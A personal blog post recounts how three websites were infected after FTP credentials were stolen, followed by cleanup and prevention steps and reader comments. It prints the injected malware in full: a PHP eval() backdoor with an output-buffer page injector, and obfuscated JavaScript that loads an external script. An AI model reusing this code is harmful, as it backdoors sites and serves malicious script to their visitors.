About two weeks ago, my websites were hacked. Not one, not two but three! If you face the same problem, this post might be useful to you as I outline the steps I have taken to overcome this problem and prevent it from happening.
SYMPTOMS
Your site is down with error:
Parse error: syntax error, unexpected T_VARIABLE in /home/hosting/public_html/index.php on line 1
Upon checking, most of main PHP, HTML and JavaScript files are altered. The following lines are appended in the top section of PHP pages:
<?php if(!function_exists(’tmp_lkojfghx’)){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined(’TMP_XHGFJOKL’))define(’TMP_XHGFJOKL’,base64_decode(’PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NUUHNTc2NyU3NpZE5wdE5KbiUyMGNNN3NkNktyY1RQJTNEJTJGTkpuJTJGOWNNNzRUUCUyRTI0N1RQJTJFMiUyRTFOSm45Y003NSUyRmNNN2pxdWVkTnJTc3klMkVjTTdqc0hZJTNFJTNDJTJGU3NzVFBjdXZqcmlwdXZqdFNzJTNFJykucmVwbGFjZSgvVFB8TkpufEhZfHV2anxkTnxTc3xkNkt8Y003L2csIiIpKTsKIC0tPjwvc2NyaXB0Pg==’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all(’#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(”\n”,$v))>5){$e=preg_match(’#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(’#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(’#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_replace(’#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);if(stristr($s,’<body’))$s=preg_replace(’#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,’</body’)||stristr($s,’</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(’tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(’tmp_lkojfghx2′))!=’tmp_lkojfghx2′)$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
The following code is appended at the bottom of HTML and JS (Javascript) pages:
<!–
document.write(unescape(’%3CTPsSscrSsidNptNJn%20cM7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9cM75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripuvjtSs%3E’).replace(/TP|NJn|HY|uvj|dN|Ss|d6K|cM7/g,”"));
–>
If you look closely, the files that have been hacked/changed carry the same timestamp (same date and time.) I believe the hackers use a program to make the changes.
POSSIBLE CAUSES
(NOTE: It was later confirmed that FTP communication was the cause as I tried updating a site using Filezilla and sure enough the site was hacked again the next day. The other two sites that were updated with online FTP are intact.)
I search on the Internet and found that many people have experienced the same problem but no solution found.
SOLUTIONS
Step 1:
There are two possible causes. Either your web server or your computer is hacked. Before you do anything, use Lavasoft (IMPORTANT: For anti-virus, Do NOT use AVG Free as it caused another problem – inability to browse the Net – use Avira instead) or Spybot S&D (free) to detect and remove any possible spyware from your computer. You may want to scan your computer on a regular basis from now on.
(UPDATE: Yesterday, I used Malwarebytes.org to scan and remove some extra spyware which went undetected by Spybot and Avira. After the scan, I used Filezilla to upload some files to a website. I found out that the site works fine until now. CONCLUSION: Malwarebytes found the problem and fixed it better than Avira and Spybot and Lavasoft. Use this in the first place.)
Step 2:
Make sure you change your FTP passwords in cPanel first before anything else. To be sure I use online FTP instead of Filezilla to edit/upload/rename files. I don’t want my new passwords to be stolen via FTP communications.
NOTE: There’s a daily limit on transfer volume when you use Net2FTP. However, you can install net2ftp on your server.
Then take one of the steps below:
Option One: Restore from Backup
Depending on your webhost, you can either do a restore of your website yourself or you have to ask the Support team to do it for you. In this step, you want to revert your website to the day before the site is hacked.
Option Two: Do It Yourself
If you don’t have a backup from cPanel or webhost, you have no choice but to do this. This is the most time consuming one. By using a web based FTP client, upload all clean HTML and PHP pages (without the funny codes as shown above) from your own backup on your PC to your server. Of course, provided you have a mirror copy of your web pages.
If you don’t, do this: Edit the affected files directly using Net2FTP.com online by removing the extra codes.
I still find that using Net2FTP to download files to desktop and edit them with Dreamweaver, and then upload back to server using Net2FTP is faster.
For MySQL databases, I am not sure if I need to make any changes to rectify this problem. It seems that it’s not affected.
Try NOT to use Filezilla to avoid passwords being stolen again by hackers.
When you take these steps, you will get your website up and running again.
Preventive Measures
Scan your computer regularly using Spybot or Lavasoft (For anti-virus, do not use AVG Free, use Avira instead). Install firewall to protect your computer from being attacked by spyware or virus.
(UPDATE: Malwarebytes.org is the best for this problem.)
Backup your website on a regular basis using cPanel. Do backup as and when you have made changes. You can also use Wordpress plugin to automate the backup process. When your site is hacked, backups come in very handy. You will be very glad that you did.
There you go. It’s has been a great experience to me as it has never crossed my mind that my sites would be hacked.
{ 3 trackbacks }
{ 10 comments… read them below or add one }
You are not alone,
I had the same thing happen with some of my clients sites. It is nice to know that someone else solved the problem also.
thanks for figuring out this problem, we’ve been plagued with this problem for a month -even tried changing hosts, your’s is the first reasonable explanation I’ve found
Just passing by and want to bring up something you may have missed. Change the account/password to your mysql database since the person who hecked you had access to your php files and that some of those files probably contained account/password used to connect to your database.
Hi,
Great post!
Just a few questions.
Did you use the FileZilla in the FTP or SFTP mode?
Did you store the passwords in FileZilla or typed them in every time you uploaded files?
Do you remember the malware names found by Malwarebytes?
Comments not working!
Never mind, they work if I enter email and website.. Here is original comment I was trying to post:
First I didn’t use my F-Secure anti-virus at all as it did slowdown my PC too much and I got wpv[NUMBERS].exe virus from my very own website, I immidently deleted it and 20 minutes later my computer crashed and didn’t boot anymore.
I fully reinstalled Windows and noticed 2 of my website had been infected by the virus. I removed the code from PHP and HTML files, it got hacked again and again!
Its not keylogger as I fixed the website with FULLY clean Windows installion. (though I visited the website and noticed F-Secure block a virus)
Im not using any CMS/Forum system, I just have infosniper IP query script and PJIRC, nothing else.
I tried setting permissions to all my files to 555 but after it got hacked the permission were 755 again..
I also contacted my host, NO ONE has logged into cPanel or FTP with my logins!
According to them its done remotetly via internet browser using glitch in PHP scripting, blaims my PHP scripts.
Since no one logged in using my logins I though there were no use to change my passwords but now after getting hacked 3th time I finally changed myself and will see if it helps at all..
There is “solution” on cPanel forums which is similar to yours.
http://forums.cpanel.net/showthread.php?t=78595
This post of yours or the one on cPanel didn’t help me..
@ Dennis: Answers to your questions:
1. I used FTP mode only but I changed to SFTP after this incident.
2. It doesn’t matter, I think. Either way is vulnerable as the login details are leaked via FTP connection.
3. No, I don’t. But later I noticed Malwarebytes overlooked this spyware. I manually removed this culprit from the registry after I found out the exact spyware. I shoud have updated this post with the latest findings but didn’t get the time to do it.
I suppose to reason he was asking question 2 was: if the passwords were saved then the script could have just been able to locate them once it was on your computer, thus identifying how the script works.
My sites are being hacked.
I’m using FileZilla. I’ve searched and found out that most of the hacked sites were suing FileZilla AND an older version of Adobe Reader 8.
Is everybody using Adobe Reader 8 when their sites were hacked?
http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
thanks,
Mike
hi, i had a keylogger trojan on my home pc they caputured my username and password of ftp, then attack it using the iframe attack i pulled the whole site down, what a nightmare, you need to download keyscrambler straight away, this plugin will scramble letters your typing into the browser. Do not login to your ftp or website from anyones elses computer or internet cafe etc, incase the trojan is present, if it happens change your email passwords too, store username and password on a piece of paper, do a weekly scan of computer with super anti spyware, trust me you will pull you head off if happens.